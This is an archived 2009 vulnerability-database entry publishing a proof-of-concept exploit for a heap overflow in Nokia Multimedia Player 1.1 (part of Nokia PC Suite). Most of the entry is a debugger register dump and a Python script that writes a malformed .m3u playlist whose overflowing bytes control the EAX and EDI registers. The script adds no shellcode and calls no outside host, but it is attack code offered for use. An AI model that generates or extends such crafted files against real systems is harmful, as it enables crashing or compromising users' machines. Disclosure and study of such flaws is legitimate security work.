Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21296
HistoryFeb 05, 2009 - 12:00 a.m.

Nokia Multimedia Player v1.1 .m3u Heap Overflow PoC exploit

2009-02-0500:00:00
vulners.com
11

Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit

by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]

http://www.Dark-Coders.pl

Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me… "to unicode.")

Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH

Nokia Multimedia Player is a element of Nokia PC Suite packet.

DOWNLOAD:http://europe.nokia.com/A4144905

Vuln:

This is heap overflow vuln, we can control EAX & EDI registers

(on my Windows XP sp3) with UNICODE chars…

DEBUG:

"Access violation when reading [00130013]"

EAX 00130013 <- !

EDX 00000000

EBX 00970000

ESP 0012F96C

EBP 0012FB8C

ESI 00AD26B0

EDI 00900011 <- !

EIP 7C910CB0 ntdll.7C910CB0

#!/usr/bin/python
eax="\x13\x13" # eax : 00130013
edi="\x11\x90" # edi : 00900011
buf="F"*261
buf+=edi+eax
buf+="B"*235
file_name="spl0.m3u"
ce=buf
f=open(file_name,'w')
f.write(ce)
f.close()
print 'PoC created!'